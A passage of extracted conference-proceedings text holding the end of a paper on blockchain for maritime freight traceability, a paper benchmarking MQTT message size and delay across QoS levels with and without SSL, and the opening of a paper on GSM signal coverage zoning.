health issue. Very concretely, goods can be entered in the database and the information concerning them will then be updated regularly from their manufacture to their delivery to the end customer. In this way, we have a complete, transparent register with distributed management that makes any unilateral modification impossible. To make the system even simpler, the necessary information can be entered into the database manually using a direct entry, or much more automatically. The widespread use of smartphones, connected sensors, facilitates the feedback of information and coupled with blockchain technology, they make it possible to easily trace products. The fight against fraud: With this technology it possible to fight against fraud in the supply chain. More than ever, companies are scrutinized and exposed to scandals like the one in 2013 which brought to light a fraud involving horse meat in frozen meals. A 2016 study puts the cost of supply chain fraud at 40 billion of dolars. Thanks to this technology, it is easy to know what information was written, by whom and when. The blockchain allows full transparency without unilateral modification being able to be made, because it is impossible to modify the data unilaterally. Supply chain optimization: Using the blockchain means making a powerful tool available to your company. Indeed, flow management is improved by the automation of certain processes made possible by this innovation used in conjunction with sensors and connected objects. Health issues/food contamination: It was necessary for the authorities to trace the entire supply chain from manufacturing to distribution, in order to identify the origin of the malfunction and withdraw the product. Traffic. The current organization of maritime transport makes this operation complicated, the use of paper supports and the difficulty in retrieving information, slow down the operation which can take several days. The transparency of a blockchain ledger can reduce the time required and ensure the safety of potential consumers. The Different Types of Blockchains There are several types of blockchain. They are categorized according to the accessibility to the network and validation rights (Dib et al. 2018): Public blockchains: They are open. That is, the blockchain can be downloaded and read without restriction and its source code is public. There is no condition for join the network, nor to become a block validator. Governance, i.e. all the operating rules of the blockchain, is open and decentralized. There are many public blockchains like Bitcoin (Nakamoto 2009) or Ethereum (Buterin 2013) for the most famous. A large number of nodes allows to ensure a better robustness of the network. In addition, the ease of access to this type of blockchains makes them attractive. Private blockchains: They are generally deployed within private networks, with trusted actors due to the sensitive nature of the information entered in the blockchain that you do not want to share on a public blockchain. Alone nodes accepted by a central authority can join the network and become valid. Date. Often one of the actors manages this blockchain and gives membership authorizations. if we. This particular actor is thus the guarantor or responsible for the transaction system.

Blockchain and IoT for Real-Time Decision Support

385

Hybrid blockchains: They couple a private blockchain, containing the information tions not wishing to be shared, and a public blockchain on which are stored other types of information such as the hash of the private blockchain blocks. The use of both types of blockchains, private and public, makes it possible to benefit from advantages offered by each of them.

Fig. 2. Differences in the different types of blockchains (Tessier, 2019)

Consortium blockchains: These blockchains [14] allow actors, sometimes concurrents, to collaborate together by sharing the information stored on a blockprivate channel that they manage collaboratively. The use of a blockchain mune allows them to streamline their exchanges and establish mutual trust. Each actor has the right to validate blocks and participates in the governance of the network.

4 What is Blockchain’s Value Proposition in Maritime Freight Transportation? In the first part of this section, we explain how the blockchain works as a technology guaranteeing security and trust in transactions, in particular using smart contracts. In a second part, we present the interest of the blockchain to build trust and improve fluidity in logistics processes. 4.1 Smart Contracts Smart contracts were introduced by [10] as computer protocols that facilitate, verify, or enforce the negotiation or performance of a contract. In blockchain they take the form of a computer program which can automatically execute transactions on the blockchain,

386

M. H. Rziki et al.

i.e. the terms of a contract, when an event or condition has occurred. This can be done automatically, without human intervention and without the need for a third party [6]. In the first case, the transactions that can be entered are limited to simple values, cryptocurrency exchanges, for example. Second-generation blockchains bring a major change. Nodes in addition to their usual abilities to verify, propagate, synchronize the blockchain, can now run code like a Turing machine (Jiao et al. 2018). This code is called smart contract and can, automatically or on call, be executed by a node. The smart contracts can also communicate with each other using messages. This new function feature, added to second-generation blockchains, allows transactions to be recorded that can be conditioned by different events and different actors involved in the transaction. A smart contract can be used to define identification processes concerning an object, for example a cargo container. It is also possible later to define transactions which then correspond to changes of state applied to this object and operated by actors whose identity must be verified: displacement, change of responsibility sability, administrative authorization, and temperature read by a sensor, position, etc. Smart contracts will thus contribute to setting up automation within pro-logistical processes. A contract can be triggered on a date or an interval defined time when the contract is registered in the blockchain. Thus, each time the conditions are met, the smart contract will perform the tasks for which it is programed. Smart contracts, on the other hand, can manage and certify that process of automating tasks on these documents takes place correctly and thus without timeout. This automation allows a very significant fluidification of the processing of the information.

5 A Model for Using Blockchain Transaction Process Our approach consists initially in the elaboration of an abstract model on which a generic method will be put in place in order to be able to adapt to many use cases, where one seeks to register information in a blockchain in addition to a system information that reacts to different events (see Fig. 2). It is a situation that is very common in many logistics or supply chain management processes. The goal is to certify and be able to trace transactions related to these events. It’s about in particular to be able to find the operations, their nature, the possible participants and the dates of their execution in the event of a dispute In a process without blockchain, events are transmitted directly to the system information (dotted arrow in Fig. 3).

Fig. 3. General model presenting the modes of interaction between events, an information system and a blockchain.

Blockchain and IoT for Real-Time Decision Support

387

In the proposed model, where a blockchain is introduced, the common information system with the blockchain in the form of requests thus allowing it to notarize (i.e. to register in a tamper-proof way) information in the blockchain and then to access it with Events Information Systeme Blockchain the certainty that they have not been altered. In addition, events can also be notarized in the blockchain, thus making it possible to reliably trace the entire process automatically and immediately. This blockchain is replicated on several servers. Synchronization and verification mechanisms ensure that the copies are identical. In our model, the purpose of the blockchain will be to ensure the consistency of a set of critical data characterizing the traceability of operations. It lift alerts in the event of abnormal events, in particular during attempts to alter data which will result in a mismatch of these data. It may be, for example, a object whose movements are subject to authorisation. These permissions are stored in the blockchain via a smart contract. In addition, the object emits at regular time intervals its geolocation which is also recorded in the blockchain. In the event of a mismatch of authorizations and geolocation, the blockchain raises an alert. In the following section, we apply this model to the traceliability of maritime freight transactions.

6 Maritime Freight Transportation With blockchain, we will be possible to digitally and automatically making data processing shorter and more efficient. Figure 4 shows the data exchanges for each event during treatment of the container on the port and which thus undergoes several operations such as loading with a unique identifier. Critical tracking information for this container is listed on the blockchain. The list of operations to be performed on the container is recorded by the information system in the blockchain. Registration in the blockchain provides unfalsifiable traceability and sure of the whole container tracking. The blockchain can be separated into two subsets: the ledger is the part in which. transactions are recorded, and the smart contracts that perform the automated processing Datas. As shown in Fig. 4, there are several types of smart contracts in our use case. Each is assigned to a particular task. 1. A smart contract receives information for traceability. These are transmitted by operators, by sensors. The smart contract registers them in the blockchain. In some case, some data presented must coincide with data already entered. If this is not the case, then the smart contract must generate an alert which is sent to the information system (position of a container which is not in motion, for example). a container is monitored by different operators. We will detail here the different stages of a trip giving rise to registrations or accesses in the blockchain. 1. The operator passes his badge in front of the connected card reader of the container which is dedicated to an authentication process. This connected card reader emits a

388

M. H. Rziki et al.

Fig. 4. Interaction of events with the information system and the blockchain integrating smart contracts.

signal containing its identifier as well as that of the operator triggering the generation of a smart contract of association. This smart contract reads previous records in the blockchain and verifies that there is a validated travel request corresponding to this association. Once this verification done, the smart contract registers in the blockchain that the movement is active. This contract is signed by the operator with its private key and registered in the blockchain. Registration in the blockchain requires a validation which will here authorize or not this request compared processes managed by the information system. 2. Once the deplacement has been made, the operator indicates to the blockchain that the operation is completed. The deplacement request smart contract ensures that the container is in place 3. The operator identifies itself with its private key which generates a record in the blockchain. It instantiates a travel request smart contract that contains the terms of the operation: the container to be moved, the starting position and the arrival position.

Blockchain and IoT for Real-Time Decision Support

389

7 Conclusion We have presented the fundamental concepts of the blockchain as well as its contribution to the logistics, we have introduced a model to securely record secure certification of real-world events in the blockchain. Smart contract have been presented, in particular for monitoring the movement of a container of goods. So, these innovative tools and technologies are multiplying. These are all effective and surprising solutions to the problems encountered by maritime transport today. The integration between IoT and Blockchain, seems to be the perfect marriage. to facilitate in a highly secure way collaborative activities (Sales, Manufacturing, Supply Chain) between multiple partners in an open ecosystem. These technologies allow us to envisage in the near future a set of opportunities for the sector such as the establishment of non-polluting and autonomous ships, a reduction in transport costs, better management of the supply chain as well as improved security and traceability. All of these elements are fascinating and demonstrate the dynamism of the logistics sector, a fortiori maritime, and its importance in the economic world of tomorrow.

References 1. De Mauro, A., Greco, M., Grimaldi, M.: What is big data? A consensual definition and a review of key research topics. AIP Conf. Proc. 1644, 97 (2015) 2. Peronja, I., Lenac, K., Glavinovi´c, R.: Blockchain technology in maritime industry. Sci. J. Maritime Res. 34 (2020), 178–184, © Faculty of Maritime Studies Rijeka (2020) 3. Gandomi, A., Haider, M.: Beyond the hype: big data concepts, methods, and analytics international. J. Inf. Manag. 35, 137–144 (2015) 4. Surya Prakash, S.: Some conceptual frameworks. Int. J. Automationand Logistics, Big Data analytics in supply chain management (2016) 5. IoT et Blockchain combinés: Quels sont les Usages? https://www.ibm.com/downloads/cas/ 1BVOLMED 6. Buterin, V.: A next generation smart contract & decentralized application platform, ethereum white paper. (2015). https://github.com/ethereum/wiki/wiki/White-Paper 7. Meunier, F.: Introduction à la recherche operationnelle, Université Paris Est 8. Haurie, A.: Recherche opérationnelle. L’Actualité économique 42(2), 324 (2015) 9. Irannezhad, E.: Is blockchain a solution for logistics and freight transportation problems? Transp. Res. Procedia 48, 290–306 (2020) 10. Szabo, N.: Formalizing and securing relationships on public networks. First Monday 2(9), (1997) 11. Jovi´c, M., Tijan, E., Marx, R., Gebhard, B.: Big data management in maritime transport 12. Konan, Y.S.: Programmation Linéaire., Université Felix Houphouët Boigny 2016–2017 13. Tasca,P., Tessone, C.: A taxonomy of blockchain technologies: principles of identification and classification. Ledger, 4 (2019).https://doi.org/10.5195/ledger.2019.140 14. Lasmoles, O., Diallo, M.T.: Impacts of blockchains on international maritime trade. J. Innov. Econ. Manag. 2022/1 N° 37, pp. 91–116

MQTT Protocol Analysis According to QoS Levels and SSL Implementation for IoT Systems Mouna Boujrad1(B) , Mohammed Amine Kasmi2 , and Noura Ouerdi1 1 Arithmetic, Scientific Computing and their Applications Laboratory (LACSA), Faculty of

Sciences (FSO), Mohammed First University (UMP), 60000 Oujda, Morocco [email protected] 2 Computer Sciences Research Laboratory (LARI), Faculty of Sciences (FSO), Mohammed First University (UMP), 60000 Oujda, Morocco

Abstract. In recent years, new challenges have been raised with the number of systems based on the Internet of things (IoT), creating by that a heterogeneous environment that requires new perspectives of old protocols with an up-to-date measurements and characteristics. WSNs (wireless sensor networks) are one of the many complications in study to be improved on IoT systems, such as in IoT, WSNs are composed of resources limited devices. This very particular specification requires new protocols to ensure good performance of data transmission. In this paper we present an analytic study on a version of the MQTT (message queuing telemetry transport) protocol, one of the most popular protocols used in IoT-based systems, that allows message transferring between two devices with different technologies, it is also known as lightweight and efficient since it takes in consideration the constrained devices on IoT systems. In this article, we evaluate its performance on the different quality of service (QoS) with and without security implementation. Keywords: MQTT · IoT · WSNs · QoS · SSL

1 Introduction IoT (internet of things) has become immensely used in various areas such as industry, smart health, e-learning, and also in our daily lives, according to Transforma insights report about 12.9 billion devices are connected in 2022 [1] this number is expected to grow to 28.5 billion devices by 2030, with this rapid increase of smart devices interconnected, new communication protocols have been developed to respond to the IoT characteristic, this can be challenging due to the limitation of the resources of IoT devices, time of execution, memory, and energy. However, many new protocols have proven efficiency in IoT systems such as MQTT (Message Queuing Telemetry Transport), CoAP (Constrained Application Protocol) [2], XMPP (Extensible Messaging and Presence Protocol) [3], DDS (Data Distribution Service) [4], AMQP (Advanced Message Queuing Protocol) [5], each one of these protocols has specific features and properties to be suitable to use in IoT systems for message transferring and communication. In © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 390–403, 2023. https://doi.org/10.1007/978-3-031-35251-5_38

MQTT Protocol Analysis

391

this paper, we are presenting a performance analysis of the MQTT protocol using the 3 levels of QoS (Quality of Service) with and without security implemented on which we are using SSL to secure the protocol since the MQTT initially came with no security.

2 Related Work In [6], authors Meena Singh et al. proposed a secure MQTT and MQTT- SN (MQTT for sensor network) by using a lightweight ECC (Elliptic curve cryptography) [7] based on KP-ABE (Key policy Attribute-based encryption) and CP-ABE (Ciphertext policy Attribute-based encryption). The authors conducted their research by comparing different key sizes for both KP/CP-ABE, results show that KP-ABE is less consuming than the CP-ABE which needs devices with highest computing power and storage. In [8], the writers Proyanka Thota et al. analyze the performance of MQRR and CoAP protocols for their efficiency and requirements on a Raspberry-pi, the results show that CoAP performs better than MQTT as the size of the transferred message increases. In [9], Dan Dinculeana and Xiaochun Cheng conducted a review on existing security solutions for the MQTT protocol, according to the review Black2s hash algorithm has the lowest time in generating the symmetric key encryption compared to other HMAC (hash message Authentication code) [10] algorithms such as MD5, SHA3-224/256/384/512, AES-CBC encryption/decryption. The authors proposed a novel approach value-toHMAC which shows better performance; however, the proposed solution provides only confidentiality and integrity, and in order to achieve a high level of security, it will need more techniques to be included which may decrease the algorithm performance. In [11], authors Monica Marti et al. present a performance study of MQTT-SN and CoAP (Constrained Application Protocol), to evaluate their network traffic and energy consumption for IoT environment, the experimental tests were carried out on the Contiki operation system [12] since it is a lightweight OS designed for the internet of things, characterized by its low power consumption a supports IoT standards for communication, the authors also used a Cooja (Network simulation for Wireless sensor network) to test the energy consumption of CoAP and MQTT-SN, the results show that MQTTSN has better performance than CoAP in a matter of energy consumption, however, it is considered slightly more complicated in implementation than CoAP. Despite the interesting simulation conducted by the authors, a secure version of these protocols was not addressed in the research, which may reverse the results if implemented with MQTT-SN and CoAP. In [13], authors Abbas M.Ali Al muqarm et al. perform an analysis of MQTT protocol with and without TLS (transport layer security), the results show that the security has been improved on the MQTT protocol, however, the performance was degraded since the MQTT with TLS consumption has increased as well as the time for establishing the connection and the amount of data, even if security has been improved the MQTT with TLS will need enough hardware resources on T devices to perform as well as the MQTT without security.

392

M. Boujrad et al.

3 Background 3.1 MQTT MQTT stands for “Message Queuing Telemetry Transport”, it is an open-source messaging protocol that ensures non-permanent communications between devices by transporting their messages. The protocol was first created in 1999 by IBM engineer Andy Stanford-Clark and Eurotech’s Arlen Nipper[14], primarily in M2M communication to enable two devices using different technologies to communicate. Since 2016, MQTT has become an ISO standard. Nowadays MQTT is already used to connect millions of devices around the world in all kinds of applications and industries [15]. As an example, Facebook Messenger uses MQTT to deliver push notification, especially for devices located in zones with a poor network [16], Location-Aware Messaging for Accessibility ( LAMA) by IBM are based on MQTT. The MQTT protocol is composed of 2 basic parts: Publisher/subscriber [17]: clients that exchange the messages, and a Broker or a server placed in the middle of the publisher and the subscriber (Fig. 1).

Fig. 1. MQTT Architecture

3.2 Quality of Service (QoS) MQTT supports 3 levels of Quality of Service (QoS) [18], to guarantee the reliability of message transfer: • QoS 0 (at most once -best effort) sends the message without checking its arrival, which in the case of large messages, the message could be lost. • QoS 1 sends the message at least once, it checks the arrival of the message to the destination using a status check PUBACK, yet if this check message gets lost the broker resents the message thinking that the message itself got lost. • QoS 2 passes the message through exactly once, it uses the four-way handshake which ensures no loss of the message but increases the delay of connection establishment and the sending process.

MQTT Protocol Analysis

393

4 Experimental Study and Results In our experimental study, we used Ubuntu as the host system for both the clients (publisher/subscriber) and the broker, the tests were divided into two main parts analyzing MQTT without security and with SSL, in each part, we did the tests on the 3 different levels of QoS. 4.1 MQTT Analysis Without Security Qos 0. When sending a message via MQTT using QoS 0, 4 types of MQTT packet control appear in the MQTT information: CONNECT, CONNACK, PUBLISH, DISCONNECT (Fig. 2).

Fig. 2. Types of MQTT control packet sent with QoS 0

The analysis made by Wireshark captured only 3 packets CONNECT, PUBLISH and DISCONNECT, since the MQTT protocol is encapsulated by the TCP packet the Acknowledgment (CONNACK) is sent via a TCP frame (Fig. 3).

Fig. 3. Captured MQTT parquets using Wireshark on QoS 0

Some frame recorded had a fixed length when sending a different payload, the only frame that changes in length is the PUBLISH Packet control captured, the PUBLISH frame starts with 76 Bytes in length when sending 1 Byte as a payload from the publisher, the MQTT PUBLISH frame increases by 2 Bytes every when increasing the Payload by 2 Bytes otherwise it (when increasing just by 1 Byte) it stays fix starting from a payload of 2 Bytes. For example, 2 Bytes send as payload record 78 Bytes MQTT Publish length, 3 bytes record the same length, but 4 Bytes payload record 80 Bytes length. As a result, we can predict the length of the MQTT publish frame of a given payload (or the opposite) just by knowing the 2 first payloads sent and their length captured (Fig. 4).

394

M. Boujrad et al.

Fig. 4. Received payload according to the payload sent and the delay of transmission on QoS 0

Captured payload = total Payload sent when sending a single packet to the subscriber (since the packet is encapsulated under a TCP frame). The payload of the MQTT publisher packet + 376 Bytes. We can observe that the Delay graph is a strictly increasing function, at the payload 20 bytes, the delay increases remarkably. Qos 1. When sending a message via MQTT using QoS 1, 5 types of MQTT packet control appear in the MQTT information: CONNECT, CONNACK, PUBLISH, PUBACK, DISCONNECT (Figs. 5 and 6).

Fig. 5. Types of MQTT control packet sent with QoS 1

Fig. 6. Captured MQTT parquets using Wireshark on QoS 1

Same remark on the delay graph as in Qos 0 at a certain point the time recorded augment remarkably her the payload is 25 bytes (5 bytes different from Qos0). The difference between Qos 0 and Qos 1 when analyzing the packets on Wireshark is that the Publish packet contains the identifier of the packet sent as we can see in the packet below the identifier equals 1. We can observe that the start payload for a 1 byte sent is 78 bytes captured in Qos 1 it’s 2 bytes more than the Qos 0 (that starts at 76 Bytes). These 2 Bytes are due to the identifier added in the publish control packet (Fig. 7): Captured payload = payload of MQTT publisher packet + 508 Bytes (Figs. 8, 9 and 10).

MQTT Protocol Analysis

395

Fig. 7. Received payload according to the payload sent and the delay of transmission on QoS 1

Fig. 8. Packet structure in QoS 0

Fig. 9. Packet structure in QoS 1

Fig. 10. Identifier coded under 2 bytes in QoS 1

Qos 2. When sending a message via MQTT using QoS 0, 7 types of MQTT packet control appear in the MQTT information: CONNECT, CONNACK, PUBLISH, PUBREC, PUBREL, PUBCOMP, DISCONNECT (Figs. 11, 12 and 13).

Fig. 11. Types of MQTT control packet sent with QoS 2

396

M. Boujrad et al.

Fig. 12. Captured MQTT packets using Wireshark on QoS 2

The same remark about the start length captured starts at 78 Bytes (in the publish control packet) because 2 bytes are added in this packet (Figs. 14 and 15).

Fig. 13. Packet structure in QoS 2

Fig. 14. Identifier coded under 2 bytes in QoS 2

Payload capture = Payload of publish MQTT packet + 578 Bytes.

Fig. 15. Received payload according to the payload sent and the delay of transmission on QoS 2

The delay graph shows an increasing function that slightly changes its speed at the payload of 900 Bytes (as we saw in Qos 0 and 1) the difference here is that the point of change is much higher than the other Quality of service. Comparing MQTT QoS results with no security (Fig. 16).

MQTT Protocol Analysis

397

Fig. 16. Received payload according to the payload sent and the delay of transmission on QoS 0, QoS 1, and QoS 2

In the Delay graph, we can see that the Qos 0 takes less time to arrive than Qos 1 and 2, because the Payload captured is less than the Payload in Qos1 and 2, but the Qos 2 takes less time than QoS 1. In the Payload analysis, the more the Qos get higher the payload augments, it’s normal because increasing the quality-of-service means adding some other control Bytes to check the sending and the arrival of the packet; The 3 graphs are constant until sending a 100 Bytes the 3 graphs become a strictly increasing function. 4.2 MQTT Analysis with Security Implemented QoS 0 with SSL. As in Qos 0 in the none secure part, 4 types of MQTT packet control appear in the MQTT information: CONNECT, CONNACK, PUBLISH, DISCONNECT (Fig. 17).

Fig. 17. Types of MQTT control packet sent with QoS 0 with SSL

The capture taken by Wireshark doesn’t the MQTT protocol in clear, because it’s encapsulated under a TLS packet (Figs. 18 and 19):

Fig. 18. Captured MQTT parquets using Wireshark on QoS 0 with SSL

398

M. Boujrad et al.

Fig. 19. Received payload according to the payload sent and the delay of transmission on QoS 0 with SSL

Total Payload = Payload of publish MQTT packet + 1088 Bytes. QoS 1 with SSL. Same MQTT packet control is sent as MQTT Qos 1 on none secure communication (Figs. 20 and 21).

Fig. 20. Types of MQTT control packet sent with QoS 1 with SSL

Fig. 21. Captured MQTT parquets using Wireshark on QoS 1 with SSL

The same difference of 2 Bytes between (Qos 0 and Qos 1) shown in the none secure part, appears in this part, the problem here is that we can’t see the 2 Bytes that have been added to the publish control Packet since the packet itself is protected via a secure layer (Figs. 22, 24 and 25 and 26).

MQTT Protocol Analysis

399

Fig. 22. Received payload according to the payload sent and the delay of transmission on QoS 1 with SSL

QoS 2 with SSL. The same packet sent as in the non-secure part (Qos 2) (Fig. 23).

Fig. 23. Types of MQTT control packet sent with QoS 2 with SSL

Fig. 24. Captured MQTT packets using Wireshark on QoS 2 with SSL

Fig. 25. Received payload according to the payload sent and the delay of transmission on QoS 2 with SSL

Comparing MQTT QoS Results with Security Added.

400

M. Boujrad et al.

Fig. 26. Received payload according to the payload sent and the delay of transmission on QoS 0, QoS 1 and QoS 2

In The delay graph Qos 1 takes less time than Qos 0 and Qos 2, but in general Qos0 and Qos 1 are still very close to each other in the matter of delay, however, Qos 2 is way much higher in the matter of time. We can remark in the Payload analysis graph that the 3 Quality of service behave the same way as a constant function, but arriving at a certain point the 3 graphs became an increasing function Qos 0 starts at 1292 Bytes captured, Qos 1 at 1362 Bytes and Qos 2 at 1462 Bytes, almost a constant number (~100 bytes ) between the 3 Qos is recorded to be the point of change of the nature of the Function.

5 Results and Discussion For the delay of transmission, we conclude that: • Qos 0: • Secure one is faster than non-secure. • The non-secure presents an increasing function but, the secure one is almost constant. • Qos 1: • Secure one is faster than non-secure. • The two functions are almost constant with a slightly increasing Part. • Qos 2: • The none-secure is faster than a secure one, and that’s because the session is overloaded with the connexon establishment with a security layer over it. • The two functions presented are remarkably an increasing function. As we can remark on the graph below the 3 Quality of service behave the same way, as an increasing function with a point when the increasing rate augments. The More the Qos get higher the more the payload increases (Fig. 27).

MQTT Protocol Analysis

401

100000000 80000000 60000000 40000000 20000000 0 1

3

5

7

9

20 40 60 80 100 300 500 702 900 1200

Delay Qos 0 Secure

Delay Qos0 None secure

Delay Qos 1 Secure

Delay Qos1 None secure

Delay Qos 2 Secure

Delay Qos2 None secure

Fig. 27. Delay comparison of the QoS levels on secure and non-secure MQTT

In the implementations, we can clearly remark that there are some points (Payload sent, Payload recorded) when the function of each Qos increases in the rate of the increasing. All Qos change at the Payload sent of 100 Bytes and 1000 Bytes (the difference between the points the second is 10 time more than the first (Fig. 28).

Fig. 28. Payload comparison of the QoS levels on secure and non-secure MQTT

When recording, the flow of packet changes between Server/ Client. We observed that after sending a number of packets that the MQTT publish packet control return to

402

M. Boujrad et al.

the first length and start increasing again, that is due to the packet segmentation which makes sense, the segmentation happens when the packet exceeded1448 bytes.

6 Conclusion In this paper, we tried to conduct a realistic benchmarking study on MQTT protocol with and without security enabled on all QoS levels. As result, MQTT shows how fast it is when it comes to sending a significant Payload, we also reveal the many characteristics and differences between The Qos levels in secure and non-secure part, it is highly recommended to use MQTT with security to maintain security over the exchanged messages between the clients (publisher/ subscriber), however, in our future work, we plan to implement the MQTT protocol with other security algorithms to compare their performance and have a clear idea on which algorithm should be chosen to fit more the IoT devices limitations.

References 1. https://transformainsights.com/research/forecast/highlights 2. Bormann, C., Castellani, A.P., Shelby, Z.: CoAP: An application protocol for billions of tiny internet node. In: IEEE Internet Computing, vol. 16, no. 2, pp. 62–67 (2012). https://doi.org/ 10.1109/MIC.2012.29 3. Open standard for message and presence. https://xmpp.org/ 4. Data distribution service foundation. https://www.dds-foundation.org/what-is-dds-3/ 5. Advanced message queuing protocol. https://www.amqp.org 6. Singh, M. Rajan, M.A., Shivraj, V.L., Balamuralidhar, P.: Secure MQTT for Internet of Things (IoT). In: Fifth International Conference on Communication Systems and Network Technologies, pp. 746–751 (2015). https://doi.org/10.1109/CSNT.2015.16 7. Verma, S., Ojha, B.: A discussion on elliptic curve cryptography and its applications. Int. J. Comput. Sci. Iss. 9 (2012) 8. Thota, P., Kim, Y.: Implementation and Comparison of M2M Protocols for Internet of Things. In: 4th International Conference on Applied Computing and Information Technology/3rd International Conference on Computational Science/Intelligence and Applied Informatics/1st International Conference on Big Data, Cloud Computing, Data Science & Engineering (ACITCSII-BCD). pp. 43–48 (2016). https://doi.org/10.1109/ACIT-CSII-BCD.2016.021 9. Dinculean˘a, D., Cheng, X.: Vulnerabilities and Limitations of MQTT Protocol Used between IoT Devices. Appl. Sci. 9(5), 848 (2019). https://doi.org/10.3390/app9050848 10. Abad, E.G., Sison, A.M.: Enhanced key generation algorithm of hashing message authentication code. In: Proceedings of the 3rd International Conference on Cryptography, Security and Privacy (ICCSP ‘19). Association for Computing Machinery, New York, NY, USA, 44–48 (2019). https://doi.org/10.1145/3309074.3309098 11. Martí, M., Garcia-Rubio, C., Campo, C.: Performance evaluation of CoAP and MQTT_SN. In: an IoT Environment Proceedings 31(1), 49 (2019). https://doi.org/10.3390/proceedings2 019031049 12. Operating system for resource-constrained devices in the Internet of Things. http://www.con tiki-os.org/ 13. Alkhafajee, A.R., Al-Muqarm, A.M.A., Alwan, A.H., Mohammed, Z.R.: Security and performance analysis of MQTT Protocol with TLS in IoT Networks. In: 4th International Iraqi Conference on Engineering Technology and Their Applications (IICETA). pp. 206–211 (2021). https://doi.org/10.1109/IICETA51758.2021.9717495

MQTT Protocol Analysis

403

14. https://www.ibm.com/support/pages/mqtt 15. Montori, F., et al.: LA-MQTT: Location-aware publish-subscribe communications for the Internet of Things. ACM Transactions on Internet of Things (2022) 16. https://web.facebook.com/notes/10158791547142200/ 17. Kurdi, H., Thayananthan, V.: A Multi-Tier MQTT architecture with multiple brokers based on fog computing for securing industrial IoT. Appl. Sci. 12(14), 7173 (2022) 18. Lee, S., Kim, H., Hong, D., Ju, H.: Correlation analysis of MQTT loss and delay according to QoS level. In: The International Conference on Information Networking 2013 (ICOIN), 2013, pp. 714–717 (2013). https://doi.org/10.1109/ICOIN.2013.6496715

New Analytical Method to Classify Areas According to Signal Quality and Coverage of GSM Network Ibrahim El Moudden1(B) , Abdellah Chentouf1 , Loubna Cherrat2 , Wajih Rhalem3 , Mohammed Rida Ech-charrat4 , and Mostafa Ezziyyani1 1 Mathematics and Applications Laboratory, Faculty of Sciences and Techniques of Tangier,

Abdelmalek Essaadi University, Tangier, Morocco elmoudden.ibrahi [email protected], {achentouf,mezziyyani}@uae.ac.ma 2 National School of Commerce and Management, Abdelmalek Essaadi University, Tangier, Morocco [email protected] 3 National School of Arts and Crafts of Rabat, Mohammed V University of Rabat, Rabat, Morocco [email protected] 4 National School of Applied Sciences of Tetouan, Abdelmalek Essaadi University, Tangier, Morocco [email protected]

Abstract. In general, the choice of a mobile package offered by operators does not depend solely on the price of services. However, the criterion of the network coverage of operators remains the most relevant parameter that influences the choice of services in relation to the geolocation of customers. Therefore, network coverage testing by operators is essential to better meet the QoS needs of consumers according to their profile. The quality (QoS) of GSM networks depends on the availability of an operator’s services for its customers and their satisfaction. This requires quality of service assessment operations via field and real-time measurements. For performance reasons related to these measures, it is necessary to take into account the diversity of user experiences in the most widespread conditions of use. For this effect, we followed an experimental methodology to create an effective measurement system that measures the different communication parameters to evaluate and upgrade the QoS. Our methodology consisted primarily on the distribution of the study area into several zones and each zone into several sectors based on broadcast stations and existing weak points. Secondly, we have developed a customized mobile application in order to collect signal strength data along with the geographical coordinates of the area concerned. For the experimental phase, we deployed our data collection application automatically in the different areas. After studying and analyzing the collected data, based on Datamining algorithms, we proposed a new schema of the physical network architecture to improve the QoS according to the consumer profile. Keywords: GSM networks · Cover · Signal strength · Flood Fill algorithm · Zoning

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 404–417, 2023. https://doi.org/10.1007/978-3-031-35251-5_39

New Analytical Method to Classify Areas According to Signal Quality

405

1 Introduction The development of mobile telecommunications networks in recent years requires an increasing consideration of the reality of the radio wave propagation medium from telecommunication operators. The telecommunication market is a competitive market where the different operators offer mobile packages at various rates. This means that mobile networking operators must have information about their own BTS and the BTS locations of their competitors, in order to reduce operating costs through the use of common locations. Mobile network operators are constantly encountering the challenge of adapting their networks to customer behavior. Population coverage by type of mobile network in 2020: [1].

Fig. 1. Population coverage by mobile network type in 2020

In most regions, more than 90% of the population has access to a mobile broadband network. There are regions such as Africa and the CIS, that face the greatest gap where 23% and 11% of the population respectively do not have access to a mobile broadband network. In this context, the deployment of 4G in 2020 in Africa recorded a growth of 21%, while growth was negligible in all other regions. About a quarter of the LDC and LSDP population and about 15% of the SIDS population do not have access to a mobile broadband network. Population coverage by mobile network type, urban or rural area, 2020 While a mobile broadband network covers virtually most of the world is urban areas, this brings us to the rural areas where many gaps remain. In LDCs, 17% of the rural population has no mobile coverage and 19% of the rural population is covered only by a 2G network (Fig. 2).

406

I. El Moudden et al.

Fig. 2. Population coverage by mobile type and zone type, 2020

Quality of service assurance must be carried out in terms of statistical guarantees valid for relatively short time intervals, of the same order of magnitude as the duration of execution of the applications. The Drive Test is a process of measuring and evaluating the coverage, capacity and quality of service (QoS) of a mobile radiotelephone network [2]. The technique involves using a motor vehicle containing a mobile radio-measuring device, which can detect and record a wide variety of physical and virtual parameters of mobile cellular service in a given geographic area. By measuring what a wireless subscriber would experience in a specific area, wireless operators can make changes to their networks that provide better coverage and service to their customers. These tests require a mobile vehicle equipped with drive test devices. These devices are generally highly specialized electronic devices that interface with mobile phones. This ensures measurements are realistic and comparable to the actual user experience in this context it first becomes imperative to have a very accurate system for measuring QoS in telecommunications networks. Before signing up for a mobile plan, it is essential to find the offer that best fits your profile. It is true that in recent years the telecommunications industry has experienced an increase in the types of wireless services, and there is a great deal of competition between the various large companies in this field. Although urban areas have coverage in the 3G

New Analytical Method to Classify Areas According to Signal Quality

407

and 4G wireless networks, there are areas that sometimes have a total lack of coverage. This means that in the middle of this imbalance, a certain class of customers sulphur from the absence of any coverage, while the rest of the customers benefit well from the service. This means that there are several customer complaints addressed to the company concerned asking for a solution for this problem. It is not possible to collect the data completely or make a total coverage in order to examine the signal levels at each position. Therefore, the precise definition of areas with low signal in the map remains a very important topic, as these areas are adjacent to areas with good coverage.

